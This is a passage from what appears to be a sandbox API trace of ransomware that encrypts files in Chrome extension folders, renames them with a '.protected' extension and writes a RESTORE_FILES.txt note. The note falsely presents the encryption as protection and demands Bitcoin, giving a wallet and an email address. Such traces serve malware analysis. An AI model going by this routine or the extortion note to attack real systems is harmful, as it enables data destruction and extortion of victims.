returned 1 [0080.362] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.362] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json") returned 155 [0080.362] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.362] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json") returned 155 [0080.362] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.362] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json") returned 155 [0080.362] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.362] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x14b, lpOverlapped=0x0) returned 1 [0080.363] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffeb5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.363] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x14b, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x14b, lpOverlapped=0x0) returned 1 [0080.364] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.364] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.364] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.364] CloseHandle (hObject=0x168) returned 1 [0080.364] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json.protected") returned 165 [0080.364] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json.protected")) returned 1 [0080.365] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.365] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.365] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\RESTORE_FILES.txt") returned 159 [0080.365] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.366] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.366] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.367] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.367] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.367] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.367] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.367] CloseHandle (hObject=0x164) returned 1 [0080.367] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.367] lstrcmpiW (lpString1="ca", lpString2="Windows") returned -1 [0080.367] lstrcmpiW (lpString1="ca", lpString2="Program Files") returned -1 [0080.367] lstrcmpiW (lpString1="ca", lpString2="Program Files (x86)") returned -1 [0080.367] lstrcmpiW (lpString1="ca", lpString2="$Recycle.bin") returned 1 [0080.367] lstrcmpiW (lpString1="ca", lpString2="System Volume Information") returned -1 [0080.367] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca") returned 141 [0080.367] lstrcmpW (lpString1="ca", lpString2=".") returned 1 [0080.367] lstrcmpW (lpString1="ca", lpString2="..") returned 1 [0080.367] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\*") returned 143 [0080.367] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.368] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.368] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.368] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.368] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.368] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.368] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\.") returned 143 [0080.368] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.369] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.369] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.369] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.369] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.369] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.369] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.369] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\..") returned 144 [0080.369] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.369] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.369] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.369] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.369] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.369] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.369] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.369] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.369] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json") returned 155 [0080.369] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.369] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.369] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.369] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.369] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.370] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json") returned 155 [0080.370] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.370] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json") returned 155 [0080.370] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.370] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json") returned 155 [0080.370] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.370] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xcf, lpOverlapped=0x0) returned 1 [0080.371] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.371] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xcf, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xcf, lpOverlapped=0x0) returned 1 [0080.371] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.371] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.371] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.372] CloseHandle (hObject=0x168) returned 1 [0080.372] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json.protected") returned 165 [0080.372] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json.protected")) returned 1 [0080.373] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.373] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.373] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\RESTORE_FILES.txt") returned 159 [0080.373] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.373] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.373] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.374] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.374] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.374] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.374] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.375] CloseHandle (hObject=0x164) returned 1 [0080.375] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.375] lstrcmpiW (lpString1="cs", lpString2="Windows") returned -1 [0080.375] lstrcmpiW (lpString1="cs", lpString2="Program Files") returned -1 [0080.375] lstrcmpiW (lpString1="cs", lpString2="Program Files (x86)") returned -1 [0080.375] lstrcmpiW (lpString1="cs", lpString2="$Recycle.bin") returned 1 [0080.375] lstrcmpiW (lpString1="cs", lpString2="System Volume Information") returned -1 [0080.375] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs") returned 141 [0080.375] lstrcmpW (lpString1="cs", lpString2=".") returned 1 [0080.375] lstrcmpW (lpString1="cs", lpString2="..") returned 1 [0080.375] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\*") returned 143 [0080.375] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.375] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.375] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.375] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.375] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.375] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.375] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\.") returned 143 [0080.375] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.376] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.376] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.376] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.376] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.376] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.376] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.376] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\..") returned 144 [0080.376] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.376] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.376] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.376] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.376] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.376] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.376] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.376] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.376] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json") returned 155 [0080.376] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.376] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.376] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.376] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.376] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js 